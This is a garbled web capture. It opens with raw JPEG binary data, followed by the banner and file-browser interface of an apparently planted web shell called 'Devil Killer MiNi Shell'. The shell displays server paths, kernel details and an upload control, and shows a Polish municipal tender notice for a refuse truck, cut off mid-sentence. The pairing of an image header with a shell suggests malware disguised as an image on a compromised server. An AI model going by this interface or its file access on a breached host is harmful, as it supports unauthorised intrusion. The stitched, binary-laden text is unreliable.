JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250710/0031935001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa śmieciarki napędzanej ON. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKIE PRZEDSIĘBIORSTWO GOSPODARKI KOMUNALNEJ SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">MPGK Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690439247</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wolności 44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mielec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">175820570</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@mpgk.mielec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mpgk.mielec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa śmieciarki napędzanej ON. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e1cf05e-3d93-4a81-839b-5b52fe59eba5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00319350</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0e1cf05e-3d93-4a81-839b-5b52fe59eba5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określone w SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej<br/>„RODO”, Zamawiający informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. adres: ul.<br/>Wolności 44, 39-300 Mielec.<br/>2. Administrator wyznaczył Inspektora Ochrony, z którym może Pani/Pan skontaktować się pod adresem e-mail:<br/>odo@mpgk.mielec.pl lub pisemnie, kierując korespondencję pod adres siedziby Administratora.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych.<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.<br/>8. Posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">11/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa fabrycznie nowego pojazdu specjalistycznego typu śmieciarka trzyosiowa jednokomorowa o pojemności skrzyni ładunkowej min. 20 m3, DMC min. 26 000 kg z napędem ON wraz możliwością odbioru odpadów ulegających biodegradacji.<br/>Pojazd wykonany zgodnie z obowiązującymi normami.<br/>Opis przedmiotu zamówienia:<br/>Wymagania dot. zabudowy:<br/>1.	Kompletnie nowa zabudowa skrzyniowa z urządzeniem załadowczym tylnym przeznaczona do zbierania odpadów stałych zmieszanych jak również odpadów gromadzonych w pojemnikach komunalnych, surowców wtórnych i BIO. Pojemności skrzyni ładunkowej min. 20 m3. Rok produkcji – nie starsza jak 2024 r.<br/>2.	Wszystkie elementy składowe zabudowy malowane przed montażem. Malowanie podkładem, a następnie lakierowane na kolor pomarańczowy RAL 2011.<br/>3.	Całkowicie uszczelniony jednoczęściowy, integralny korpus skrzyni z odwłokiem ze zgniotem min. 5:1. Zamawiający dopuszcza układ prasowania odpadów bez elementów suwliwych, tzw. jarzmowy z siłą zgniotu wynoszącą 7:1.<br/>4.	Boki skrzyni ładunkowej wykonane z blachy konstrukcyjnej lub trudnościeralnej o grubości min. 4 mm .<br/>5.	Dno skrzyni ładunkowej wykonane z blachy trudnościeralnej o grubości min. 4 mm. <br/>6.	Wanna załadowcza wykonana z blachy trudnościeralnej o twardości HB 425-475; granicy plastyczności RE 1250; granicy wytrzymałości RM 1550 lub równoważnej o grubości dna min. 8 mm, boki o grubości min. 6 mm. <br/>7.	Uszczelka między płytą wypychającą, a ścianą boczną. Zabudowa musi być szczelna.<br/>8.	Skrzynia ładunkowa wzmocniona profilami zewnętrznymi lub kształt zabudowy owalny. <br/>9.	Mechanizm zgniatania liniowo – płytowy (szufladowy). Zamawiający dopuszcza mechanizm prasowania odpadów jarzmowy.<br/>10.	Możliwość sterowania mechanizmem załadowczym (zasyp) w cyklu automatycznym, ciągłym oraz manualnym. Zamawiający dopuści sterowanie wrzutnikiem elektro – hydrauliczne.<br/>11.	Prowadnice łopaty wypychającej wewnątrz zabudowy – na ścianach bocznych.<br/>12.	Wrzutnik obsługujący pojemniki o pojemności od 80 l do 1100 l.<br/>13.	Wrzutnik montowany na śrubach, demontowalny i wykonany w konstrukcji stalowej w technologii zabezpieczenia antykorozyjnego ocynkowany.<br/>14.	Płyta zasypowa otwierana, umożliwiająca obniżenie krawędzi zasypowej do 1,2m. od podłoża, umożliwiając wrzucanie worków.<br/>15.	Wrzutnik z możliwością instalacji systemu RFID i wagi dynamicznej.<br/>16.	Możliwość ręcznego zatrzymywania ruchu pojemnika w dowolnym momencie.<br/>17.	Wysokość od podłoża do stałej krawędzi wrzutnika max. 1400 mm.<br/>18.	Dwa stopnie dla ładowaczy z czujnikiem zajętości oraz poręcze po bokach zbiornika.<br/>19.	Sterowanie wrzutnikiem proporcjonalnie za pośrednictwem dźwigni lub pulpitów zamontowanych po obu stronach odwłoka.<br/>20.	Możliwość opróżniania skrzyni ładunkowej z kabiny kierowcy.<br/>21.	Oświetlenie wg obowiązujących przepisów o ruchu drogowym.<br/>22.	Dwa wyłączniki bezpieczeństwa (stop awaryjny) umieszczone po obu stronach zabudowy, jeden w kabinie kierowcy.<br/>23.	Płynna regulacja zgniotu. Zamawiający dopuszcza stopniową regulację siły zgniotu.<br/>24.	Ciśnienie robocze min. 230 bar.<br/>25.	Szczelna zabudowa uniemożliwiająca wyciek płynów.<br/>26.	Kamera z kolorowym monitorem umieszczonym w kabinie kierowcy (monitor min. 5,6’) umożliwiająca stałą obserwację tyłu samochodu.<br/>27.	Siłowniki płyty nośnej zamontowane na zewnątrz, siłowniki prasy zamontowane wewnątrz z tłoczyskami zamontowanymi do góry wykonanymi ze specjalnie utwardzonych materiałów zabezpieczających powierzchnię tłoczysk przed uszkodzeniami. Zamawiający dopuszcza siłowniki płyty nośnej zamontowane wewnątrz odwłoka oraz dopuszcza rozwiązanie, w którym wszystkie siłowniki prasy są zamontowane wewnątrz odwłoka, z tłoczyskami skierowanymi do góry, wykonanymi ze specjalnie utwardzonych materiałów oraz zabezpieczonych w sposób pyłoszczelny.<br/>28.	Układ uwalniania zakleszczonych pojemników.<br/>29.	Osłona instalacji hydraulicznej. <br/>30.	Stopień zagęszczania odpadów min. 5:1.<br/>31.	Oświetlenie robocze z boku i z tyłu kabiny.<br/>32.	Lampy ostrzegawcze LED z przodu i z tyłu zabudowy.<br/>33.	Pasy odblaskowe na kabinie i odwłoku.<br/>34.	Sygnał dźwiękowy przy cofaniu.<br/>35.	Węzeł sanitarny do mycia rąk.<br/>36.	Gwarancja na zabudowę nie mniejsza niż 24 miesiące.<br/>37.	Nadwozie zgodne z prawem unijnym ze znakiem CE.<br/>38.	Możliwość odprowadzania odcieków ze skrzyni ładunkowej i wanny zasypowej.<br/>39.	Instrukcja obsługi i eksploatacji w języku polskim w 1 egzemplarzu.<br/>40.	Książka serwisowa.<br/><br/>Wymagania dot. podwozia samochodowego.<br/>1.	Podwozie fabrycznie nowe 6x2, DMC nie mniejsze niż 26 000 kg.<br/>2.	Rok produkcji nie starsze niż 2024 r.<br/>3.	Silnik zasilany ON.<br/>4.	Moc silnika min. 300 KM. <br/>5.	Tachograf.<br/>6.	Zbiorniki paliwa prawa strona min. 200 litrów.<br/>7.	Filtr powietrza (wlot) za kabiną kierowcy. Ponadto Zamawiający dopuszcza rozwiązanie z wlotem powietrza umieszczonym za kabiną kierowcy oraz filtrem zlokalizowanym pod kabiną.<br/>8.	Układ wydechowy wyprowadzony w dół.<br/>9.	Skrzynia biegów automatyczna, bez sprzęgła suchego.<br/>10.	Przystawka mocy odsilnikowa niezależna od skrzyni biegów, z możliwością wyłączenia.<br/>11.	Pojazd przystosowany do ruchu prawostronnego, kierownica po lewej stronie.<br/>12.	Podwozie przystosowane do zabudowy śmieciarki, do normy 1501-1.<br/>13.	Nośność osi przedniej min. 8 000 kg.<br/>14.	Nośność tylnego wózka min. 19 000 kg.<br/>15.	Myjka do rąk.<br/>16.	Uchwyt na miotłę i łopatę – montowany na przedniej ścianie skrzyni.<br/>17.	Ładowność pojazdu nie mniejsza niż 8 000kg.<br/>18.	Układ napędowy pojazdu 6x2 – druga oś napędowa na bliźniakach.<br/>19.	Rozstaw osi pojazdu max. 3600 mm.<br/>20.	Opony z bieżnikiem typu regionalnego rozmiar 315/70/R22,5, na każdej osi.<br/>21.	Zawieszenie osi przedniej resory paraboliczne. <br/>22.	Tylne zawieszenie pneumatyczne. Kontrola zawieszenia tylnego za pomocą pilota. <br/>23.	Pojazd wyposażony w hamulce tarczowe, układ stabilizujący tor jazdy (ESP/EVCS), układ hamowania awaryjnego automatycznego (AEBS WE).<br/>24.	System ostrzegania o niekontrolowanej zmianie pasa ruchu (LDWS).<br/>25.	Blokada mechanizmu różnicowego osi napędowej.<br/>26.	Poziom hałasu zgodny z normą UE .<br/>27.	Akumulatory 2 x 12V i minimum 225 Ah .<br/>28.	Alternator minimum 110A.<br/>29.	Gaśnica.<br/>30.	Trzy oddzielne miejsca wyposażone w pasy bezpieczeństwa.<br/>31.	Osłona przeciwsłoneczna zewnętrzna.<br/>32.	Podnośnik hydrauliczny 10 t.<br/>33.	Wywietrznik dachowy.<br/>34.	Elektrycznie sterowane szyby.<br/>35.	Lusterka wsteczne podgrzewane i regulowane elektrycznie.<br/>36.	Lusterko rampowe i lusterko krawężnikowe.<br/>37.	Fabryczny immobilizer.<br/>38.	Dwa komplety kluczyków do pojazdu.<br/>39.	Pistolet sprężonego powietrza w kabinie kierowcy. <br/>40.	Wyświetlacz z komputerem pokładowym w języku Polskim.<br/>41.	Reflektory ze światłami LED do jazdy dziennej.<br/>42.	Światła przeciwmgłowe przednie. <br/>43.	Boczne światła obrysowe.<br/>44.	Klimatyzacja kabiny.<br/>45.	Radio fabryczne ze sterowaniem z kierownicy.<br/>46.	Pojazd oznakowany zgodnie z § 9 Rozporządzenia Ministra Środowiska z dnia 07.10.2016 r. w sprawie szczególnych wymagań dla transportu odpadów (Dz. U. z 2016 r. poz. 1742).<br/>47.	Instrukcja obsługi i eksploatacji w języku polskim min. w 1 egzemplarzu.<br/>48.	Książka serwisowa.<br/>49.	Przeszklona dolna część drzwi od pasażera.<br/>50.	Możliwość ręcznego sterowania wypalaniem filtra cząstek stałych.<br/>51.	Gwarancja nie mniejsza niż 24 miesiące. Czas naprawy gwarancyjnej 5 dni.<br/>52.	W przypadku nie usunięcia usterki do 5 dni Wykonawca zapewnia nieodpłatne podstawienie równoważnego (spełniającego wszystkie wymogi wskazane w SWZ) pojazdu zastępczego na cały okres wyłączenia z eksploatacji (naprawy) pojazdu stanowiącego przedmiot umowy.<br/><br/>Dodatkowo:<br/><br/>Zamawiający zastrzega możliwość doposażenia pojazdu w systemy firmy ELTE GPS, pojazd winien być dostosowany pod montaż bez utraty warunków gwarancji:<br/>•	modułu lokalizacji pojazdu. <br/>•	modułu rejestracji parametrów pracy pojazdu. <br/>•	modułu RFID (zabudowa jak i grzebienie urządzenia wrzutowego dostosowane pod montaż modułu RFID, anten oraz sygnałów akustycznego i optycznego).<br/>•	modułu dynamicznego ważenia odpadów (zabudowa dostosowana pod montaż)<br/>•	modułu rejestracji zdjęć (pojazd dostosowany pod montaż PHOTOBOXA z trzema kamerami. Pierwsza kamera – przód pojazdu, druga kamera - prawa strona pojazdu, trzecia kamera tył pojazdu (odwłok).<br/>•	modułu Terminala PDA.<br/>•	w złącza adaptacyjne (z wyprowadzonymi sygnałami elektrycznymi inf. o otwarciu odwłoka, pracy urządzenia wrzutowego, załączenia przystawki mocy). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144510-6 - Pojazdy do transportu odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34144511-3 - Pojazdy do zbierania odpadów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu wykazania braku<br/>podstaw do wykluczenia Wykonawcy z postępowania o udzielenie zamówienia:<br/>a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy Pzp sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium. <br/>Warunkiem uczestnictwa w postępowaniu jest wniesienie przez Wykonawcę wadium w wysokości 10 000,00 złotych (słownie: dziesięć tysięcy złotych 00/100). <br/>Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:<br/>a) pieniądzu, przelewem na rachunek bankowy w Banku Pekao 30 1240 2656 1111 0000 3793 0943 z dopiskiem w tytule wadium do przetargu nr 11/2025.<br/>c) gwarancjach bankowych, <br/>d) gwarancjach ubezpieczeniowych, <br/>e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 I 1572). <br/>Wadium w innej formie niż pieniądz należy złożyć wraz z ofertą w postaci elektronicznej.<br/>Gwarancja/poręczenie musi być podpisana przez przedstawiciela Gwaranta. Wadium w formie poręczenia lub gwarancji musi obejmować cały okres związania ofertą, a beneficjentem takich dokumentów musi być Zamawiający, tj. Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. ul. Wolności 44, 39-300 Mielec. <br/>Z treści gwarancji /poręczenia winno wynikać 